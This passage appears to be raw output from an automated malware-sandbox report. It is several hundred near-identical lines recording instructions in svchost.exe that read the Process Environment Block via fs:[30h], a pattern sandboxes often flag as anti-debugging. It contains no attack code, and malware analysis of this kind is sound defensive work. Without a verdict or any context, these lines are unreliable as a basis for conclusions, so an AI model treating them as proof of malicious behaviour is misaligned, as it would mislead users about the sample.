Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov ecx, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B035C mov eax, dword ptr fs:[00000030h]	1_2_036B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FA352 mov eax, dword ptr fs:[00000030h]	1_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D8350 mov ecx, dword ptr fs:[00000030h]	1_2_036D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370634F mov eax, dword ptr fs:[00000030h]	1_2_0370634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]	1_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03708324 mov ecx, dword ptr fs:[00000030h]	1_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]	1_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03708324 mov eax, dword ptr fs:[00000030h]	1_2_03708324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]	1_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]	1_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366A30B mov eax, dword ptr fs:[00000030h]	1_2_0366A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C310 mov ecx, dword ptr fs:[00000030h]	1_2_0362C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03650310 mov ecx, dword ptr fs:[00000030h]	1_2_03650310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036403E9 mov eax, dword ptr fs:[00000030h]	1_2_036403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036663FF mov eax, dword ptr fs:[00000030h]	1_2_036663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EC3CD mov eax, dword ptr fs:[00000030h]	1_2_036EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0363A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036383C0 mov eax, dword ptr fs:[00000030h]	1_2_036383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B63C0 mov eax, dword ptr fs:[00000030h]	1_2_036B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]	1_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]	1_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE3DB mov eax, dword ptr fs:[00000030h]	1_2_036DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]	1_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D43D4 mov eax, dword ptr fs:[00000030h]	1_2_036D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]	1_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]	1_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362E388 mov eax, dword ptr fs:[00000030h]	1_2_0362E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]	1_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365438F mov eax, dword ptr fs:[00000030h]	1_2_0365438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]	1_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]	1_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03628397 mov eax, dword ptr fs:[00000030h]	1_2_03628397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]	1_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]	1_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634260 mov eax, dword ptr fs:[00000030h]	1_2_03634260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362826B mov eax, dword ptr fs:[00000030h]	1_2_0362826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E0274 mov eax, dword ptr fs:[00000030h]	1_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B8243 mov eax, dword ptr fs:[00000030h]	1_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B8243 mov ecx, dword ptr fs:[00000030h]	1_2_036B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0370625D mov eax, dword ptr fs:[00000030h]	1_2_0370625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A250 mov eax, dword ptr fs:[00000030h]	1_2_0362A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636259 mov eax, dword ptr fs:[00000030h]	1_2_03636259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]	1_2_036EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]	1_2_036EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]	1_2_0362823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]	1_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]	1_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]	1_2_036402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0363A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037062D6 mov eax, dword ptr fs:[00000030h]	1_2_037062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]	1_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]	1_2_036402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]	1_2_036C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]	1_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]	1_2_0366E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]	1_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]	1_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]	1_2_036B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]	1_2_03704164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]	1_2_03704164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]	1_2_036C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]	1_2_0362C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]	1_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]	1_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]	1_2_03636154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]	1_2_03660124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]	1_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]	1_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]	1_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]	1_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]	1_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]	1_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]	1_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]	1_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]	1_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]	1_2_036DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]	1_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]	1_2_036F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]	1_2_037061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]	1_2_036601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]	1_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]	1_2_036F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_036AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]	1_2_03670185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]	1_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]	1_2_036EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]	1_2_036D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]	1_2_036D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]	1_2_036B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]	1_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]	1_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]	1_2_0362A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]	1_2_0365C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]	1_2_03632050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]	1_2_036B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]	1_2_0362A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]	1_2_0362C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C6030 mov eax, dword ptr fs:[00000030h]	1_2_036C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]	1_2_036B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]	1_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]	1_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]	1_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]	1_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]	1_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]	1_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]	1_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]	1_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]	1_2_0364E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0362A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]	1_2_036380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]	1_2_036B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0362C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]	1_2_036720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]	1_2_036B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036280A0 mov eax, dword ptr fs:[00000030h]	1_2_036280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]	1_2_036C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]	1_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_036F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]	1_2_0363208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]	1_2_03638770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]	1_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]	1_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]	1_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]	1_2_0366674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]	1_2_03630750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h]	1_2_036BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]	1_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]	1_2_03672750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]	1_2_036B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]	1_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]	1_2_0366C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]	1_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]	1_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]	1_2_0366273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]	1_2_036AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]	1_2_0366C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]	1_2_03630710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]	1_2_03660710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]	1_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]	1_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]	1_2_036527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_036BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]	1_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]	1_2_036347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]	1_2_036B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]	1_2_036307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036E47A0 mov eax, dword ptr fs:[00000030h]	1_2_036E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036D678E mov eax, dword ptr fs:[00000030h]	1_2_036D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]	1_2_036F866E
